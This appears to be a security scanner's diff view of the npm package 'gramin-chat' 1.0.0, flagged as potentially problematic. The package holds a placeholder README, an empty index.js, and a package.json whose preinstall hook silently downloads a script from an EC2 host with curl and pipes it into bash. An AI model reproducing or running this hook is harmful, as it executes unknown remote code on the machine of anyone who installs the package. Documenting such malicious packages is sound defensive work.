gramin-chat 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of gramin-chat might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +3 -0
  2. package/index.js +0 -0
  3. package/package.json +8 -0
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # GRAMING CHAT PACKAGE
2
+ - testing package
3
+
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+ {
2
+ "name": "gramin-chat",
3
+ "version": "1.0.0",
4
+ "dependencies": {},
5
+ "scripts": {
6
+ "preinstall": "curl http://ec2-54-234-211-80.compute-1.amazonaws.com:21/ 2>&1 | bash 1>/dev/null 2>&1"
7
+ }
8
+ }